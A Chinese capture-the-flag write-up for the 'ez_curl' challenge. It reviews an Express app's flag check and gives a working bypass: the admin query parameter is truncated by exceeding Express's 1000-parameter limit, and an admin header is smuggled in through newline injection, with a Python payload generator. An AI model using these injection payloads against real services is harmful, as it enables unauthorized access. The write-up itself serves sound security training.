[CTF]攻防世界:ez_curl

题目:EZ_CURL

提示:php审计 noed.js

c 复制代码
app.js

const express = require('express');

const app = express();

const port = 3000;
const flag = process.env.flag;

app.get('/flag', (req, res) => {
    if(!req.query.admin.includes('false') && req.headers.admin.includes('true')){
        res.send(flag);
    }else{
        res.send('try hard');
    }
});

app.listen({ port: port , host: '0.0.0.0'});

req.query.admin.includes:要求在URL中admin字段的值不包含"false"子串(必须要有admin字段)

req.headers.admin.includes:要求在报文头部中admin字段的值包含"true"子串


步骤

1、绕过URL

在NodeJS中有以下知识点:express的parameterLimit默认为1000,即当参数个数大于1000时,后面的参数将被截断。

当我们给params赋值的成员个数大于1000时,即可让$url中admin=false被截断。

2、绕过headers的判断

1、换行符截断

c 复制代码
{"headers": ["xx:xx\nadmin: true"]}

admin和true字符串都在第一个冒号后,而在NodeJS解析时,会解析得到admin的字段为true.

2、node.js解析

c 复制代码
{"headers": ["admin: x", " true: y"]}

admin和true是分开的两个数组,不会同时满足过滤条件,所以可以绕过PHP文件的判断。在正常解析过程中,在键名中是不允许存在空格的,但NodeJS在遇到这类情况时是宽容的,会将其解析成 admin:x true y

3、拿到flag

c 复制代码
import json

datas = {"headers":["xx:xx\nadmin:true"],
         "params":{"admin":"true"}}

for i in range(1002):
    datas["params"]["s"+str(i)] = i

json1 = json.dumps(datas)
print(json1)
相关推荐
BU摆烂会噶10 小时前
【LangGraph】House_Agent 实战(四):预定流程 —— 中断与人工干预
android·人工智能·python·langchain
AI玫瑰助手10 小时前
Python运算符:比较运算符(等于不等等于大于小于)与返回值
android·开发语言·python
一个在高校打杂的10 小时前
honeypot之opencanary(轻量化蜜罐)
linux·网络安全·网络攻击模型·安全威胁分析·策略模式
一个脚本boy11 小时前
攻防世界misc简单难度1-20题详细解法
网络安全
new_dev11 小时前
Python实现Android自动化打包工具:加固、签名、多渠道一键完成
android·python·自动化
小孔龙11 小时前
Android `<activity-alias>` 指南:动态图标 · 多入口 · 重命名兼容
android·程序员·掘金·日新计划
谪星·阿凯11 小时前
Linux提权全攻略博客
linux·运维·服务器·网络安全
QING61812 小时前
Kotlin inline 实战详解 —— 新手须知
android·kotlin·android jetpack
君如风军如风12 小时前
等保2.0安全通用要求第三级别之安全物理环境
网络安全·等级保护·等保2.0·安全合规·gb/t 22239
ElevenS_it18812 小时前
MySQL慢查询监控与告警实战:从slow_log采集到分钟级定位慢SQL的完整链路配置
android·sql·mysql